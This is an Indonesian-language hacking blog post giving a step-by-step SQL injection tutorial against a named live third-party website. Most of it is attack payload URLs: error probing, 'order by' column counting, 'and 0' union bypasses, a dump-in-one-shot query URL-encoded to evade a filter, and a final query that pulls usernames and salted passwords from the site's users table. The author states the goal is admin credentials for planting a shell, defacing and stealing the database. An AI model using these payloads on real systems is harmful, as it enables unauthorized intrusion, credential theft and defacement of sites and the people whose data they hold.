Monday, May 16, 2016

Sql Injection Encode URL [Tutorial]

0 comment
Assalamualaikum Warrahmatullahi Wabarakatuhu


Selamat siang sobat ,
sudah liat kah video2 yang saya upload ?
ya mungkin terkesan sok atau apalah tapi itu kembali ke pribadi masing2
disini ane share cuma untuk belajar dan buat mengingatkan kembali khususnya untuk diri ane sendiri
maaf bila terkesan menggurui dan juga kurang berkenan
udah dulu curhatnya hehehe

lanjut ke topik  , kali ini ane mau share Tutorial Yang pastinya masih berbasic SQL INJECTION
manual dan manual.....
sering kali kita temui macam macam error yang membuat kita agak geram dan juga penasaran
pokoknya campur aduk deh ...
tapi jangan nyerah sob kalau hanya masalah gak temu gak muncul angka togel dll keep explore
just copy and paste errornya di google banyak yang sudah share kok

untuk melakukan hal ini pastinya sudah mengetahui basic dari SQL injection
dan peralatannya juga sudah tau :D
kalau yang belum tau silahkan Download di Hackbar Modified By Shariq

nah disini ane pakai target yang sudah pasaran atau jelasnya udah bekas haha
tapi jangan di rusak yo bro ini semua untuk belajar aja
jadi kalau kita menemukan error atau masalah seperti ini gak muter2 dan gak beli obat puyeng lagi
hehehe

https://www.kanisco.com/en/training/autocad---basic-level?coid=1 < live target No Error :P still normal
live target dari salah satu group zone show off :D
Defacer Tersakiti Team :P pasti dah pada tau dong hehe

 https://www.kanisco.com/en/training/autocad---basic-level?coid=1' < error :D

pasti sudah tau untuk check vuln atau tidaknya suatu web ini dengan exploit SQL nya karena dari post ini sudah di jelaskan harus memiliki Basic SQL Injectin Manual :D
lanjut cari Table

 https://www.kanisco.com/en/training/autocad---basic-level?coid=1' order by 1--+ < No Error
https://www.kanisco.com/en/training/autocad---basic-level?coid=1' order by 1200--+ < Error

https://www.kanisco.com/en/training/autocad---basic-level?coid=1' order by 5--+ < No Error

 https://www.kanisco.com/en/training/autocad---basic-level?coid=1' order by 6--+ < Error
 disini kita temukan error di 6 berarti nih site hanya punya 5 table

selanjutnya kita cari columns dari sitenya

setelah kita injek dengan union select 1,2,3,4,5 tidak muncul angka togelnya
mari kita coba bypass menggunakana

[+] .1'
[+] -1'
[+] 1 and false
[+] 1 and 0
[+] 1 and true

biasanya para injector menggunakan command di atas yang ane sering pakai cuma and false + and 0 :D
https://www.kanisco.com/en/training/autocad---basic-level?coid=1' union select 1,2,3,4,5--+

nah setelah kita tambah and 0 angka togelnya muncul :D mungkin bisa di bilang bypass angka togel yang tidak muncul querynya :D hihihi

 https://www.kanisco.com/en/training/autocad---basic-level?coid=1' and 0 union select 1,2,3,4,5--+

terus gimana kalau masih gak muncul juga setelah di masukan command2 diatas ?
biasanya untuk bypass itu pakai %60 nanti atau bisa liat di channel youtube ane gan

ok selanjutnya untuk mempermudah kita melihat nama tabel dan kolomnya
langsung aja di DIOS

tapi tidak seperti DIOS biasanya Ini sudah di pakai dios apapun tetap Forbidden :D hihi
karena DIOS nya gak sesuai judul :D dan harus di ENCODE menggunakan encode URL
https://www.kanisco.com/en/training/autocad---basic-level?coid=1' and 0 union select 1,2,(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5--+

nah dios diatas tidak bisa menampilkan nama tabel dan kolom mari kita coba encode ke URL untuk melihat hasilnya hihhi

https://www.kanisco.com/en/training/autocad---basic-level?coid=1' and 0 union select 1,2,%28%53%65%6c%65%63%74%20%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%3a%3d%30%2c%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%66%72%6f%6d%28%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%63%6f%6c%75%6d%6e%73%29%77%68%65%72%65%40%3a%3d%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%65%78%70%6f%72%74%5f%73%65%74%28%35%2c%40%2c%74%61%62%6c%65%5f%6e%61%6d%65%2c%30%78%33%63%36%63%36%39%33%65%2c%32%29%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%61%33%61%2c%32%29%29%2c%40%2c%32%29%29,4,5--+

nah ini DIOS nya yang kita Encode URL
hasil bisa di lihat seperti gambar :D hihi
ok selanjutnya kita cari sesuai keinginan biasanya cari USER + Pass Adminya untuk masuk ke suatu websitenya khususnya untuk pasang shell dan tebas bahkan curi databasenya :D bisa juga LOG buat penuh2in emailmu kwkwkwkw



https://www.kanisco.com/en/training/autocad---basic-level?coid=1' and 0 union select 1,2,%67%72%6f%75%70%5f%63%6f%6e%63%61%74%28%75%73%65%72%5f%75%73%65%72%6e%61%6d%65%2c%30%78%33%61%33%61%33%61%2c%75%73%65%72%5f%73%61%6c%74%65%64%5f%70%61%73%73%77%6f%72%64%29,4,5 from users--+

tara nongol juga username dan passnya :D
ok mungkin segitu aja dulu yang bisa ane share
owh iya klo mau cari Admin Page nya mampir kesini dulu siapa tau membantu
Cara Cari Admin Login Suatu Website

oke sekian terimakasih :D
You Might Also Like
No comments

Post a Comment

Whatsapp Button works on Mobile Device only

Start typing and press Enter to search